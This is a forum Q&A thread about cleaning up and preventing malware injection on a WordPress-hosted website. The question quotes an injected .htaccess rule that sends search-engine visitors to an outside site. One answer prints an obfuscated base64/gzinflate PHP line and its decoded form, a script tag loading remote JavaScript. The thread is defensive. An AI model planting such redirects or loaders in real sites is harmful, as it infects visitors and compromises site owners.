How to prevent my website from getting malware injection attacks?

Question

My website was banned as a malware website by Google. When I checked the code, I found out that some code injected many files on my server. I cleaned everything manually, edited all files on my server (shared hosting) by searching some code from the injected code in all the files. Even the .htaccess file was modified by the attacker.

There were two WordPress installations on the website, in two different subfolders of the website root, which were not updated. I updated both.

Then Google removed ban on my website.

Yesterday, I found out that the .htaccess file on my website was again modified by the attacker. Here is the code:

#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#

I searched for "b58b6f" in all the files, but I don't find any. I think this is the only file modified by the most recent attack. I deleted this .htaccess file, as I don't need it.

How was the hacker able to hack my website? How to prevent this to happen again? How I can make my website more secure?

Answer 1

It seems that the malware you encountered is the "daysofyorr.com virus" or MW:HTA:7.

I'm suggesting that you to use FileZilla as the FTP client. If so, you must know that FileZilla store the credentials of your websites in plain text. A virus may have accessed your credentials, and then accessed all your registered websites searching for WordPress install in order to update the files by inserting this code.

Now, you should:

• Search your computer for any viruses, malware, etc.
• Change the FTP password of all your registered FTP accounts saved in FileZilla
• Eventually use a better FTP system, like WinSCP

A late comment, but I suspect that you use FileZilla as your FTP client. Did you know that FileZilla stores your FTP site credentials (site/user/pass) in a plain text file in the %APPDATA% folder?

And I also suspect there is a hidden malware on your computer. It grabbed your FileZilla credential files, and used them to change your header.php file in your theme folder. In fact, I suspect that you will find changed header.php in all of your themes folders.

And if you are technical enough to look at your FTP log files, you will find the access to those files: a download, then an upload of the changed files. You might also find some random file names that were uploaded to your root ('home') folder, although those files were deleted by the hacker.

And, you will find that the IP address in the FTP log of the hacker was from China.

Recommendation: uninstall FileZilla, delete the FileZilla folder from %APPDATA% folder, change your FTP passwords (and your host passwords). And look for any changed header.php, footer.php, and wp-settings.php files.

For the "daysofyorr.com virus", you can confirm this by checking some of your PHP files (like index.php), if you find this code:

#b58b6f#
echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
#/b58b6f#

That's it!

For information, it translate into:

<script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>

Which seems to lead to a 404 nowadays.

Answer 2

1. Check logs see if you can work out the point it was compromised
2. Ensure your Wordpress and any plugins are up to date. Since Wordpress is such a commonly used system its quite prone to vulnerabilities.
3. If you still can't figure out whats gone on it might be worth contacting the company that provides your shared hosting and make them aware of the issue, as it could be a result of an out of date application or something that they are hosting.

Answer 3

1. If your hosting company has their own version of wordpress that they constantly update I would reccomend going with that VS a fresh install on your own. The probability would be decreased on getting compromised since you would most likely only have access to it VIA an admin panel.

2. As for Filezilla, it does support SFTP and FTPS so that may be another option provided that your host supports an encrypted FTP.

3. Lastly you may be able to block IP ranges of say outside of North America which could aid in blocking the attacks since most attacks are from overseas to make legal avenues usually not worth while to go after.